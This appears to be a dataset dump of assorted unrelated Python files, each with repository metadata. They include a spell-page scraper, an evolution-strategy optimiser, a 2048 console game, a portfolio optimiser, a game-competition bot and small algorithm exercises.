SEED, MinDist, MaxDist = 1, 1, 100
def generate_seq(k,length,seed): import random; random.seed(seed); return [tuple(sorted(random.sample(range(k),2))+[random.randint(MinDist,MaxDist)]) for _ in range(length)] # (5,10)
#tuple1 = generate_seq(10,50,1)
#dense_tuples = generate_seq(1000, 50000, 1)
dense_tuples = generate_seq(1000, 1000000, SEED)
VEset = ((1000,5000),(1000,10000),(1000,50000),(1000,500000),(1000,1000000))
print("see: {}, Weight_Range: {}~{}\n".format(SEED,MinDist,MaxDist))
for V, E in VEset:
print("V={}, E={}".format(V, E))
t1 = time.time()
res = shortest1(V, dense_tuples[:E])
print("decrease-key_DIY:{0}, time {1:.3f}, pop:{2}, push:{3}".format(res,time.time()-t1,npop,npush))
t1 = time.time()
res = shortest(V, dense_tuples[:E])
print("heappush-only: {0}, time {1:.3f}, pop:{2}, push:{3}".format(res,time.time()-t1,npop,npush))
t1 = time.time()
res = shortest2(V, dense_tuples[:E])
print("heapdict_new: {0}, time {1:.3f}, pop:{2}, push:{3}\n".format(res,time.time()-t1,npop,npush))
#pdb.set_trace()
'''
tuples_1 = generate_seq(5000, 50000, 1)
tuples_2 = generate_seq(5000, 50000, 4)
V,E = 5000, 50000
t1 = time.time()
print(shortest(V, tuples_1))
print("V={}, E={}, total time {}".format(V, E,time.time()-t1))
V,E = 5000, 50000
t1 = time.time()
print(shortest(V, tuples_2))
print("V={}, E={}, total time {}".format(V, E,time.time()-t1))
'''
| true |
78fcae8c3007923f8ad2c86600b677df325e4f36 | Python | bud386/algo-CS | /백준_구현/1783_병든나이트.py | UTF-8 | 307 | 3.171875 | 3 | [] | no_license | import sys
n, m = map(int, sys.stdin.readline().split())
ans = 1
if n > 2:
if m < 5:
ans = m
elif m == 5 or m == 6:
ans = 4
else:
ans = m - 2
elif n == 2:
#2 1, 2 2, 2 3, 2 4, 2 5, 2 6
if m < 7:
ans = (m+1) // 2
else:
ans = 4
print(ans)
| true |
5e66690b2bea28bade592c3e2ba78a1c107c4066 | Python | mahdissfr/Dimension_Reduction_by_PCA | /src/ES.py | UTF-8 | 4,911 | 3.046875 | 3 | [] | no_license | import random
import numpy
from Chromosome import Chromosome
########## b andaze Mu
from file_handler import read_from_file
from plot import plot
def generate_initial_population(chromosome_length, min_ab, max_ab, x, y):
list_of_chromosomes = []
genes = []
for i in range(chromosome_length):
list_of_chromosomes.append(Chromosome(chromosome_length, min_ab, max_ab, x, y))
genes.append(list_of_chromosomes[i].gene)
return list_of_chromosomes
def generate_new_seed(Mu):
lambdaParents = []
size = len(Mu)
for i in range(7 * size):
index = random.randint(0, size - 1)
lambdaParents.append(Mu[index])
"""
:return: return lambda selected parents
"""
# Todo
return lambdaParents
def crossover(chromosome1, chromosome2, alpha):
gene1 = chromosome1.gene
gene2 = chromosome2.gene
chromosome1.gene[0] = alpha * gene1[0] + (1 - alpha) * gene2[0]
chromosome2.gene[0] = alpha * gene2[0] + (1 - alpha) * gene1[0]
chromosome1.gene[1] = alpha * gene1[1] + (1 - alpha) * gene2[1]
chromosome2.gene[1] = alpha * gene2[1] + (1 - alpha) * gene1[1]
chromosome1.evaluate()
chromosome1.evaluate()
return chromosome1, chromosome1
# def get_sigma(x_sigma, ps, c):
# if ps == 0.2:
# return x_sigma
# elif ps < 0.2:
# return c * x_sigma
# else:
# return x_sigma / c
def get_sigma(sigma_max, sigma_min, t, N):
return sigma_max + (sigma_min - sigma_max) * t / N
def mutation(chromosome, sigma):
"""
Don't forget to use Gaussian Noise here !
:param chromosome:
:return: mutated chromosome
"""
GaussianNoise = numpy.random.normal(loc=0.0, scale=1.0, size=None)
chromosome.gene[0] = chromosome.gene[0] + sigma * GaussianNoise
chromosome.gene[1] = chromosome.gene[1] + sigma * GaussianNoise
return chromosome
def evaluate_new_generation(generation):
# Todo
"""
Call evaluate method for each new chromosome
:return: list of chromosomes with evaluated scores
"""
for chromosome in generation:
chromosome.evaluate()
return
def Q_tournament(parents):
q = 4
index = random.randint(0, len(parents) - 1)
best = parents[index]
for i in range(q - 1):
index = random.randint(0, len(parents) - 1 - i)
tmp = parents[index]
if tmp.fitness > best.fitness:
best = tmp
return best, index
def choose_new_generation(Mu, lambdaParent):
# Todo
"""
Use one of the discussed methods in class.
Q-tournament is suggested !
:return: Mu selected chromosomes for next cycle
"""
parents = lambdaParent
parents.extend(Mu)
newGeneration = []
for i in range(len(Mu)):
best, index = Q_tournament(parents)
newGeneration.append(best)
parents.pop(index)
return newGeneration
if __name__ == '__main__':
MuSize = 10
crossover_probability = 0.4
# N = 100
N = 100
min_ab = 0
max_ab = 1
x, y = read_from_file()
chromosome_length = len(x)
# chromosome_length = 10
# ps = 1
# c = 0.8
alpha = 0.5
Smin = 1
k = 0.125
Mu = generate_initial_population(chromosome_length, min_ab, max_ab, x, y)
max_node = max(Mu, key=lambda node: node.fitness)
min_node = min(Mu, key=lambda node: node.fitness)
avg_fitness = sum(c.fitness for c in Mu) / len(Mu)
print("t=0 best fitness: " + str(max_node.fitness) + " worst: " + str(
min_node.fitness) + " average fitness: " + str(avg_fitness))
Smax = k * (max_node.fitness - min_node.fitness)
print("smax: "+str(Smax))
for t in range(N):
lambdaParent = generate_new_seed(Mu)
for i in range(len(lambdaParent)):
# lambdaParent[i].sigma = get_sigma(lambdaParent[i].sigma, ps, c)
lambdaParent[i].sigma = get_sigma(Smax, Smin, t, N)
mutation(lambdaParent[i], lambdaParent[i].sigma)
crossovered = []
toCrossOver = int(crossover_probability * len(lambdaParent) / 2)
for j in range(toCrossOver):
index1 = random.randint(0, len(lambdaParent) - 1)
chromosome1 = lambdaParent.pop(index1)
index2 = random.randint(0, len(lambdaParent) - 1)
chromosome2 = lambdaParent.pop(index2)
crossovered.extend(crossover(chromosome1, chromosome2, alpha))
lambdaParent.extend(crossovered)
evaluate_new_generation(lambdaParent)
Mu = choose_new_generation(Mu, lambdaParent)
max_node = max(Mu, key=lambda node: node.fitness)
min_node = min(Mu, key=lambda node: node.fitness)
avg_fitness = sum(c.fitness for c in Mu) / len(Mu)
print("t=" + str(t+1) + " ) best fitness: " + str(max_node.fitness) + " worst: " + str(
min_node.fitness) + " average fitness: " + str(avg_fitness))
print(str(max_node.get_normal_ab()))
plot(max_node)
| true |
30877994f9aa3f3bcc569f6c2ad6c3e09066b0e1 | Python | vakor50/Dashboard | /Spells/scrape.py | UTF-8 | 4,165 | 2.65625 | 3 | [] | no_license | import csv
import requests
from BeautifulSoup import BeautifulSoup
import json
import re
import HTMLParser
h = HTMLParser.HTMLParser()
# https://www.dndbeyond.com/spells/abi-dalzims-horrid-wilting/more-info
# https://www.dndbeyond.com/spells/absorb-elements/more-info
class Spell(object):
"""docstring for Spell"""
pass
list_of_spells = []
for x in range(1,23):
print x
url = 'https://www.dndbeyond.com/spells?page=' + str(x)
response = requests.get(url)
html = response.content
soup = BeautifulSoup(html)
table = soup.find('ul', attrs={'class': 'listing listing-rpgspell rpgspell-listing'})
for row in table.findAll('div', attrs={'class': 'info'}):
spellObj = Spell()
link_section = '';
link = row.find('a', attrs={'class': 'link'})
link_section = link['href']
# print "\nlink: " + link_section
name = row.find('div', attrs={'class': 'row spell-name'})
component = name.findAll('span')
# print "name: " + component[0].text
n = h.unescape(component[0].text.replace("€", "'"))
n = re.sub(r'[^\x00-\x7f]',r'', n)
# n = n.replace('’', '\'').replace(' ', ' ')
spellObj.name = n
# print "school: " + component[2].text
spellObj.school = component[2].text
# print "component: " + component[4].text
spellObj.components = component[4].text
level = row.find('div', attrs={'class': 'row spell-level'})
# print "level: " + level.span.text
spellObj.level = level.span.text
cast_time = row.find('div', attrs={'class': 'row spell-cast-time'})
# print "cast time: " + cast_time.text
spellObj.casting_time = cast_time.text
duration = row.find('div', attrs={'class': 'row spell-duration'})
# print "duration: " + duration.text
spellObj.duration = duration.span.text
range = row.find('div', attrs={'class': 'row spell-range'})
# print "range: " + range.text
spellObj.range = range.text
save = row.find('div', attrs={'class': 'row spell-attack-save'})
# print "save: " + save.text
spellObj.save = save.text
for ritual in row.findAll('i', attrs={'class': 'i-ritual'}):
spellObj.ritual = "yes"
for concentration in row.findAll('i', attrs={'class': 'i-concentration'}):
spellObj.concentration = "yes"
# -----------------------------------------------------------------
spell_url = 'https://www.dndbeyond.com' + link_section + '/more-info'
# print "url: " + spell_url
spell_response = requests.get(spell_url)
spell_html = spell_response.content
spell_soup = BeautifulSoup(spell_html)
# print spell_soup.find('div', attrs={'class': 'more-info-body-description'})
for spell_page in spell_soup.findAll('div', attrs={'class': 'more-info-body-description'}):
# print "desc: "
description = []
for d in spell_page.findAll('p'):
desc = h.unescape(d.text.replace("€", "\'"))
desc = re.sub(r'[^\x00-\x7f]',r'', desc)
# desc = desc.replace('’', '\'').replace(' ', ' ')
description.append('<p>' + desc + '</p>')
spellObj.desc = ''.join(description)
# for description in spell_page.findAll('p'):
# print description
# spellObj.desc += description
for materials in spell_page.findAll('span', attrs={'class': 'components-blurb'}):
m = h.unescape(materials.text.replace("€", "'"))
m = re.sub(r'[^\x00-\x7f]',r'', m)
# m = m.replace('’', '\'').replace(' ', ' ').replace('€', '').replace('™', '')
spellObj.material = m
list_of_spells.append(spellObj)
print "\n\n\n"
# for s in list_of_spells:
# if hasattr(s, 'desc'):
# print s.desc
# print "\n\n\n"
output = []
for s in list_of_spells:
output.append(s.__dict__)
# print(s.__dict__)
with open("dndbeyond_spells.json", 'wb') as outfile:
json.dump(output, outfile)
# json.dumps(result)
# list_of_cells = []
# for cell in row.findAll('td'):
# text = cell.text.replace(' ', '')
# list_of_cells.append(text)
# list_of_rows.append(list_of_cells)
# outfile = open("./inmates.csv", "wb")
# writer = csv.writer(outfile)
# writer.writerow(["Last", "First", "Middle", "Gender", "Race", "Age", "City", "State"])
# writer.writerows(list_of_rows) | true |
b267fd041fa7455343e30bab48eb35bf9d1565be | Python | hyperac1d/Web-Python-Exercises | /countme.py | UTF-8 | 2,749 | 3.296875 | 3 | [] | no_license | print("Enter as many words as you can in the word BREAKER")
breaker = ['ark', 'eke', 'err', 'era', 'bee', 'rare', 'reek', 'bake',
'bark', 'bare', 'beer', 'beak', 'bear', 'baker', 'brake',
'break', 'barker', 'beaker', 'bearer', 'breaker', 'are',
'ear', 'ere', 'bar', 'bra', 'rake', 'rear']
count = 0
#for x in breaker:
# word = str(input("Word: "))
# if(word.lower() in breaker):
# count = count +1
word1 = str(input("Word: "))
if (word1.lower() in breaker):
count = count+1
word2 = str(input("Word: "))
if (word2.lower() in breaker):
count = count+1
word3 = str(input("Word: "))
if (word3.lower() in breaker):
count = count+1
word4 = str(input("Word: "))
if (word4.lower() in breaker):
count = count+1
word5 = str(input("Word: "))
if (word5.lower() in breaker):
count = count+1
word6= str(input("Word: "))
if (word6.lower() in breaker):
count = count+1
word7 = str(input("Word: "))
if (word7.lower() in breaker):
count = count+1
word8 = str(input("Word: "))
if (word8.lower() in breaker):
count = count+1
word9 = str(input("Word: "))
if (word9.lower() in breaker):
count = count+1
word10 = str(input("Word: "))
if (word10.lower() in breaker):
count = count+1
word11= str(input("Word: "))
if (word11.lower() in breaker):
count = count+1
word12 = str(input("Word: "))
if (word12.lower() in breaker):
count = count+1
word13 = str(input("Word: "))
if (word13.lower() in breaker):
count = count+1
word14 = str(input("Word: "))
if (word14.lower() in breaker):
count = count+1
word15 = str(input("Word: "))
if (word15.lower() in breaker):
count = count+1
word16 = str(input("Word: "))
if (word16.lower() in breaker):
count = count+1
word17 = str(input("Word: "))
if (word17.lower() in breaker):
count = count+1
word18 = str(input("Word: "))
if (word18.lower() in breaker):
count = count+1
word19 = str(input("Word: "))
if (word19.lower() in breaker):
count = count+1
word20 = str(input("Word: "))
if (word20.lower() in breaker):
count = count+1
word21 = str(input("Word: "))
if (word21.lower() in breaker):
count = count+1
word22 = str(input("Word: "))
if (word22.lower() in breaker):
count = count+1
word23 = str(input("Word: "))
if (word23.lower() in breaker):
count = count+1
word24 = str(input("Word: "))
if (word24.lower() in breaker):
count = count+1
word25 = str(input("Word: "))
if (word25.lower() in breaker):
count = count+1
word26 = str(input("Word: "))
if (word26.lower() in breaker):
count = count+1
word27 = str(input("Word: "))
if (word27.lower() in breaker):
count = count+1
print('You got', count,' number of words in the word BREAKER')
| true |
13d9f7fde9723979dd53966aac7b30b1fd7f712a | Python | connerza/compInvestingHW | /HW1/hw1.py | UTF-8 | 2,824 | 2.90625 | 3 | [] | no_license | # QSTK Imports
import QSTK.qstkutil.qsdateutil as du
import QSTK.qstkutil.tsutil as tsu
import QSTK.qstkutil.DataAccess as da
# Third Party Imports
import datetime as dt
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
def simulate(startDate, endDate, symbols, allocations):
#Read in adjusted closing prices for the 4 equities.
dt_timeofday = dt.timedelta(hours = 16)
ldt_timestamps = du.getNYSEdays(startDate, endDate, dt_timeofday)
c_dataobject = da.DataAccess('Yahoo', cachestalltime=0)
keys = ['close']
ldf_data = c_dataobject.get_data(ldt_timestamps, symbols, keys)
data = dict(zip(keys, ldf_data))
# Filling the data for NAN
for s_key in keys:
data[s_key] = data[s_key].fillna(method='ffill')
data[s_key] = data[s_key].fillna(method='bfill')
data[s_key] = data[s_key].fillna(1.0)
na_price = data['close'].values
#Normalize the prices according to the first day.
#The first row for each stock should have a value of 1.0 at this point.
na_price = na_price / na_price[0]
#Multiply each column by the allocation to the corresponding equity.
for i, equity in enumerate(symbols):
na_price[:, i] = na_price[:, i] * allocations[i]
#Sum each row for each day. That is your cumulative daily portfolio value.
daily_rets = [sum(l)/sum(na_price[i-1]) - 1 for i,l in enumerate(na_price) if i != 0]
daily_rets.insert(0, sum(na_price[0]) - 1)
#Compute statistics from the total portfolio value.
stdDevRet = np.std(daily_rets)
avRet = sum(daily_rets) / len(daily_rets)
sharpeRatio = np.sqrt(250) * avRet / stdDevRet
cumRet = sum(daily_rets)
return stdDevRet, avRet, sharpeRatio, cumRet
if __name__ == '__main__':
optimal = {}
optimal['sharpe'] = 0
optimal['allocations'] = []
startDate = dt.datetime(2010,1,1)
endDate = dt.datetime(2010,12,31)
symbols = ['BRCM', 'ADBE', 'AMD', 'ADI']
for x in xrange(0,10):
for y in xrange(0, 10-x):
for z in xrange(0, 10-x-y):
allocations = [x*.1, y*.1, z*.1, (10-x-y-z)*.1]
stdDevRet, avRet, sharpeRatio, cumRet = simulate(startDate, endDate, symbols, allocations)
if sharpeRatio > optimal['sharpe']:
optimal['sharpe'] = sharpeRatio
optimal['allocations'] = [x*.1, y*.1, z*.1, (10-x-y-z)*.1]
optimal['volatility'] = stdDevRet
optimal['average'] = avRet
optimal['cumulative'] = cumRet
print str.format("Start Date: {}", startDate.strftime("%B %d, %Y"))
print str.format("End Date: {}", endDate.strftime("%B %d, %Y"))
print str.format("Symbols: {}", symbols)
print str.format("Optimal Allocations: {}", optimal['allocations'])
print str.format("Sharpe Ratio: {}", optimal['sharpe'])
print str.format("Volatility: {}", optimal['volatility'])
print str.format("Average Daily Return: {}", optimal['average'])
print str.format("Cumulative Return: {}", optimal['cumulative'])
| true |
5c36bed10d58472bc7702bc8d8849209b887b72b | Python | max180643/PSIT-IT | /Week-16/NumDays.py | UTF-8 | 866 | 3.53125 | 4 | [] | no_license | """
NumDays
Author : Chanwit Settavongsin
"""
def main(frist_day, frist_month, second_day, second_month):
""" Find day total """
data = {
1:31, 2:28, 3:31, 4:30,
5:31, 6:30, 7:31, 8:31,
9:30, 10:31, 11:30, 12:31
}
if frist_day <= data[frist_month] and second_day <= data[second_month]:
if frist_month == second_month:
print(max(frist_day, second_day) - min(frist_day, second_day))
else:
data1 = {}
temp = 0
data1[frist_month] = frist_day
data1[second_month] = second_day
data2 = sorted(data1)
for i in range(data2[0]+1, data2[1]):
temp += data[i]
print(data[data2[0]] - data1[data2[0]] + data1[data2[1]] + temp)
else:
print("Impossible")
main(int(input()), int(input()), int(input()), int(input()))
| true |
c1d70f709925b90b55fcbd81e891613b56101e4a | Python | Ved005/project-euler-solutions | /code/stone_game_ii/sol_325.py | UTF-8 | 1,484 | 4 | 4 | [
"Apache-2.0"
] | permissive |
# -*- coding: utf-8 -*-
'''
File name: code\stone_game_ii\sol_325.py
Author: Vaidic Joshi
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #325 :: Stone Game II
#
# For more information see:
# https://projecteuler.net/problem=325
# Problem Statement
'''
A game is played with two piles of stones and two players. At her turn, a player removes a number of stones from the larger pile. The number of stones she removes must be a positive multiple of the number of stones in the smaller pile.
E.g., let the ordered pair(6,14) describe a configuration with 6 stones in the smaller pile and 14 stones in the larger pile, then the first player can remove 6 or 12 stones from the larger pile.
The player taking all the stones from a pile wins the game.
A winning configuration is one where the first player can force a win. For example, (1,5), (2,6) and (3,12) are winning configurations because the first player can immediately remove all stones in the second pile.
A losing configuration is one where the second player can force a win, no matter what the first player does. For example, (2,3) and (3,4) are losing configurations: any legal move leaves a winning configuration for the second player.
Define S(N) as the sum of (xi+yi) for all losing configurations (xi,yi), 0 < xi < yi ≤ N. We can verify that S(10) = 211 and S(104) = 230312207313.
Find S(1016) mod 710.
'''
# Solution
# Solution Approach
'''
'''
| true |
9da780ec5ea8c12d33231cb1c439d007cf1bbe12 | Python | ahillard/Python-Web-Scrapers | /open_states_api.py | UTF-8 | 2,733 | 2.8125 | 3 | [] | no_license | # import json, requests
#####################################################
###Problem 1
#####################################################
###Use the following documentation to identify url
###https://sunlightlabs.github.io/openstates-api/legislators.html#examples/legislator-detail
# url = 'http://openstates.org/api/v1/legislators/?state=mo&active=true'
# r = requests.get(url)
# legislators = json.loads(r.content)
# full_names = [record['full_name'] for record in legislators]
# print full_names
#####################################################
###Problem 2
#####################################################
###Use the followig documentation to identify url for problem 2
###https://sunlightlabs.github.io/openstates-api/bills.html#bill-fields
# url = 'http://openstates.org/api/v1/bills/?state=mo&chamber=upper&search_window=session'
# r = requests.get(url)
# bills_introduced = json.loads(r.content)
# print bills_introduced
###Or, if you only want to print the id...
# bill_id = [record['bill_id'] for record in bills_introduced]
# print bill_id
#####################################################
###Problem 3
#####################################################
# subjects_bills_introduced = [record['subjects'] for record in bills_introduced]
# ###There are no subjects for the bills listed in Problem 2
# ###Modified search to include bills from both house and senate as lower chamber appears to record subject
# url = 'http://openstates.org/api/v1/bills/?state=mo&search_window=session&subject=Health'
# r = requests.get(url)
# bills_introduced_subject = json.loads(r.content)
# print bills_introduced_subject
# ###Or, if you only want to print the id...
# bill_id = [record['bill_id'] for record in bills_introduced_subject]
# print bill_id
#####################################################
###Problem 4
#####################################################
import json, requests
url = 'http://openstates.org/api/v1/bills/?state=mo&search_window=session&subject=Health'
r = requests.get(url)
bills_introduced_subject = json.loads(r.content)
title = [record['title'] for record in bills_introduced_subject]
bill_id = [record['bill_id'] for record in bills_introduced_subject]
last_action = []
for x in bill_id:
url = 'http://openstates.org/api/v1/bills/mo/2016/' + x + '/'
r = requests.get(url)
bill_details = json.loads(r.content)
bill_actions = bill_details['actions']
last_action.append(bill_actions[len(bill_actions)-1]['action'])
id_action = zip(bill_id, last_action)
###Or, if you want title, change bill_id to title in above code
print 'Id and Last Action Taken for Bills Related to Health'
for x in id_action:
print x[0] + ' ' + x[1]
| true |
a9cfaa7cd2d5776e8406cb3b7d511b6735838ea0 | Python | RinaKorca/simpleRestAPI | /helper.py | UTF-8 | 186 | 2.6875 | 3 | [] | no_license | import string
import random
def generateUniqueID(chars=string.ascii_lowercase + string.digits,madhesia = 12):
return ''.join(random.choice(chars) for _ in range(madhesia)) | true |
149defe1978b3c7378e70118cd063db4c5e2e845 | Python | wang264/JiuZhangLintcode | /Algorithm/L3/require/140_fast-power.py | UTF-8 | 697 | 3.75 | 4 | [] | no_license | # 140. Fast Power
# 中文English
# Calculate the a^n % b where a, b and n are all 32bit non-negative integers.
#
# Example
# For 2^31 % 3 = 2
#
# For 100^1000 % 1000 = 0
#
# Challenge
# O(logn)
class Solution:
"""
@param a: A 32bit integer
@param b: A 32bit integer
@param n: A 32bit integer
@return: An integer
"""
def fastPower(self, a, b, n):
# write your code here
if n == 0:
return 1 % b
if n == 1:
return a % b
partial_rslt = self.fastPower(a, b, n // 2)
if n % 2 == 0:
return (partial_rslt * partial_rslt) % b
else:
return (partial_rslt * partial_rslt * a) % b | true |
a7a3a910821fd42e9ed1c322dec8673052a8ed9f | Python | maeckie/adventofcode_2018 | /day_4/main.py | UTF-8 | 1,861 | 2.921875 | 3 | [] | no_license | #!/usr/bin/python
import re
import collections
import datetime
import time
with open('/Users/marcus/Documents/advent/adventofcode_2018/day_4/gute_input.txt') as file:
input = file.readlines()
input = map(lambda x: x.replace('\n', ''), input)
d = {}
for line in input:
m = re.match('\[(.*)\](.*)', line)
d[m.group(1)] = m.group(2)
def break_down_guard_sleep():
all_guards = {}
guard = 0
for key in sorted(d):
if 'Guard' in d[key]:
guard = re.search('Guard #(\d+) begins shift', d[key]).group(1)
if guard not in all_guards:
all_guards[guard] = {'total':0, 'all_mins': []}
elif 'sleep' in d[key]:
start_sleep = int(key.split(':')[1])
else:
stop_sleep = int(key.split(':')[1])
mins = stop_sleep - start_sleep
all_guards[guard]['total'] += mins
#start_min = int(str(start_sleep).split(':')[1])
all_guards[guard]['all_mins'].extend(range(start_sleep,mins+start_sleep))
return all_guards
def part1():
all_guards = break_down_guard_sleep()
find_max = ''
for itm in all_guards:
if find_max == '':
find_max = itm
elif all_guards[itm]['total'] > all_guards[find_max]['total']:
find_max = itm
print int(find_max) * max(set(all_guards[find_max]['all_mins']), key=all_guards[find_max]['all_mins'].count)
def part2():
all_guards = break_down_guard_sleep()
find_max = 0
g = 0
minute = 0
for guard in all_guards:
mins = collections.Counter(all_guards[guard]['all_mins'])
for m in mins.most_common():
if m[1] > find_max:
minute = m[0]
find_max = m[1]
g = guard
break
print int(g) * int(minute)
part1()
part2()
| true |
828b64b67c8ddd8ce7211153a5328357f747da4c | Python | J-woooo/acmicpc | /13458.py | UTF-8 | 576 | 2.9375 | 3 | [] | no_license | import sys
input = sys.stdin.readline
n = int(input())
studentList = list(map(int, input().split(" ")))
b, c = map(int, input().split(" "))
result = n
# for i in range(n):
# studentList[i] -= b
# if studentList[i] <= 0:
# continue
# elif not studentList[i] == 0:
# if studentList[i] % c == 0:
# result += (studentList[i] // c)
# else:
# result += (studentList[i] // c) + 1
for num in studentList:
num -= b
if num <= 0:
continue
result += num // c if num % c == 0 else num // c + 1
print(result) | true |
0189dbae6c8b991f80b15d9c36962bddd718e451 | Python | siggame/MegaMinerAI-12 | /shellAI/python/AI.py | UTF-8 | 4,946 | 2.890625 | 3 | [] | no_license | #-*-python-*-
from BaseAI import BaseAI
from GameObject import *
class AI(BaseAI):
"""The class implementing gameplay logic."""
WORKER, SCOUT, TANK = range(3)
@staticmethod
def username():
return "Shell AI"
@staticmethod
def password():
return "password"
##This function is called once, before your first turn
def init(self):
pass
##This function is called once, after your last turn
def end(self):
pass
##This function is called each time it is your turn
##Return true to end your turn, return false to ask the server for updated information
def run(self):
numberOfUnits = 0
#get the number of units owned
for u in self.units:
#if I own this unit increase the count
if u.owner == self.playerID:
numberOfUnits += 1
#look for my tiles
for tile in self.tiles:
#if this tile is my spawn tile or my pump station
if tile.owner == self.playerID:
#get the unit cost for a worker
cost = 0
for u in self.unitTypes:
if u.type == self.WORKER:
cost = u.cost
#if there is enough oxygen to spawn the unit
if self.players[self.playerID].oxygen >= cost:
#if can spawn more units in
if numberOfUnits < self.maxUnits:
#if nothing is spawning on the tile
if tile.isSpawning == 0:
canSpawn = True
#if it is a pump station and it's not being sieged
if tile.pumpID != -1:
#find the pump in the vector
for pump in self.pumpStations:
if pump.id == tile.pumpID and pump.siegeAmount > 0:
canSpawn = False
#if there is someone else on the tile, don't spawn
for other in self.units:
if tile.x == other.x and tile.y == other.y:
canSpawn = False
if canSpawn:
#spawn the unit
tile.spawn(self.WORKER)
numberOfUnits += 1
moveDelta = 0
if self.playerID == 0:
moveDelta = 1
else:
moveDelta = -1
#do stuff for each unit
for unit in self.units:
#if you own the unit
if unit.owner != self.playerID:
continue
#try to move to the right or left movement times
for i in range(unit.maxMovement):
canMove = True
#if there is no unit there
for others in self.units:
if unit.x + moveDelta == others.x and unit.y == others.y:
canMove = False
#if nothing's there and it's not moving off the edge of the map
if canMove and (0 <= unit.x + moveDelta < self.mapWidth):
#if the tile is not an enemy spawn point
if (not (self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].pumpID == -1 and \
self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].owner == 1 - self.playerID)) or \
self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].owner == 2:
#if the tile is not an ice tile
if not (self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].owner == 3 and
self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].waterAmount > 0):
#if the tile is not spawning anything
if self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].isSpawning == 0:
#if the unit is alive
if unit.healthLeft > 0:
#move the unit
unit.move(unit.x + moveDelta, unit.y)
#if there is an enemy in the movement direction and the unit hasn't
#attacked and it is alive
if unit.hasAttacked == 0 and unit.healthLeft > 0:
for other in self.units:
#check if there is an enemy unit in the direction
if unit.x + moveDelta == other.x and \
unit.y == other.y and other.owner != self.playerID:
#attack it
unit.attack(other)
break
#if there is a space to dig below the unit and the unit hasn't dug
#and the unit is alive
if unit.y != self.mapHeight - 1 and \
self.tiles[unit.x * self.mapHeight + unit.y + 1].pumpID == -1 and \
self.tiles[unit.x * self.mapHeight + unit.y + 1].owner == 2 and \
unit.hasDug == False and unit.healthLeft > 0:
canDig = True
#make sure there is no unit on that tile
for other in self.units:
if unit.x == other.x and unit.y + 1 == other.y:
canDig = False
#make sure the tile is not an ice tile
if(canDig and \
not (self.tiles[unit.x * self.mapHeight + unit.y + 1].owner == 3 and \
self.tiles[unit.x * self.mapHeight + unit.y + 1].waterAmount > 0)):
unit.dig(self.tiles[unit.x * self.mapHeight + unit.y + 1])
return 1
def __init__(self, conn):
BaseAI.__init__(self, conn)
| true |
dec9a01489aee3050c681c08e6bf358b654d51a3 | Python | paulo-romano/attributetools | /attributetools.py | UTF-8 | 340 | 2.953125 | 3 | [
"MIT"
] | permissive | # coding: utf-8
def set_attributes(func, **dict_attributes):
for key in dict_attributes:
func.__setattr__(key, dict_attributes[key])
class attribute():
def __init__(self, **attributes):
self.attributes = attributes
def __call__(self, func):
set_attributes(func, **self.attributes)
return func
| true |
39d7904a21a3366c5bf4242389c3df1859502e83 | Python | nickligen/Python-100-Days | /Day01-15/Day05/practice/guess.py | UTF-8 | 387 | 4.1875 | 4 | [] | no_license | import random
answer = random.randint(1,100)
count = 0
while True:
count=count+1
number=int(input('Guess a number:'))
if number>answer:
print('Bigger than answer')
elif number<answer:
print('Smaller than answer')
else:
print('You are correct!')
break
print('The answer is ' +str(number))
print('You tried ' + str(count) + ' times')
| true |
d5228e24ed51b467aea45ec66bdef0b59d72d1b6 | Python | chiaolun/console-2048 | /console2048.py | UTF-8 | 2,010 | 3.0625 | 3 | [] | no_license | from __future__ import print_function
import os
import sys
from model import Game
# Python 2/3 compatibility.
if sys.version_info[0] == 2:
range = xrange
input = raw_input
def _getch_windows(prompt):
"""
Windows specific version of getch. Special keys like arrows actually post
two key events. If you want to use these keys you can create a dictionary
and return the result of looking up the appropriate second key within the
if block.
"""
print(prompt, end="")
key = msvcrt.getch()
if ord(key) == 224:
key = msvcrt.getch()
return key
print(key.decode())
return key.decode()
def _getch_linux(prompt):
"""Linux specific version of getch."""
print(prompt, end="")
sys.stdout.flush()
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
new = termios.tcgetattr(fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(fd, termios.TCSANOW, new)
char = None
try:
char = os.read(fd, 1)
finally:
termios.tcsetattr(fd, termios.TCSAFLUSH, old)
print(char)
return char
# Set version of getch to use based on operating system.
if sys.platform[:3] == 'win':
import msvcrt
getch = _getch_windows
else:
import termios
getch = _getch_linux
def main():
"""
Get user input.
Update game state.
Display updates to user.
"""
keypad = "adws"
game = Game(*map(int, sys.argv[1:]))
game.display()
while True:
get_input = getch("Enter direction (w/a/s/d): ")
if get_input in keypad:
game.move(keypad.index(get_input))
elif get_input == "q":
break
else:
print("\nInvalid choice.")
continue
if game.end:
game.display()
print("You Lose!")
break
game.display()
print("Thanks for playing.")
if __name__ == "__main__":
main()
| true |
cbbe43c5ee643ada18c8919b8475cf43c47c9c4f | Python | galactics/beyond | /beyond/utils/constellation.py | UTF-8 | 3,106 | 3.515625 | 4 | [
"MIT"
] | permissive | """Utilities to compute the parameters of a constellation.
At the moment, only the Walker Star and Walker Delta are available
(see `wikipedia <https://en.wikipedia.org/wiki/Satellite_constellation#Walker_Constellation>`__)
"""
import numpy as np
class WalkerStar:
"""Definition of the WalkerStar constellation
Example: Iridium is a Walker Star 66/6/2 constellation
so to generate this, one has to call ``WalkerStar(66, 6, 2)``
"""
def __init__(self, total, planes, spacing, raan0=0):
"""
Args:
total (int) : Total number of satellites
planes (int) : Number of planes
spacing (int) : relative spacing between satellites of adjacent planes
raan0 (float) : RAAN of the first plane (in radians)
This call order is compliant with Walker notation total/planes/spacing.
"""
self.total = total
self.planes = planes
self.spacing = spacing
self.raan0 = raan0
def __repr__(self): # pragma: cover
return f"<{self.__class__.__name__} {self.total}/{self.planes}/{self.spacing}>"
@property
def per_plane(self):
"""Number of satellites per orbital plane"""
return self.total // self.planes
def raan(self, i_plane):
"""
Args:
i_plane (int) : index of the plane
Return:
float : Right Ascension of Ascending Node in radians
"""
return np.pi / self.planes * i_plane + self.raan0
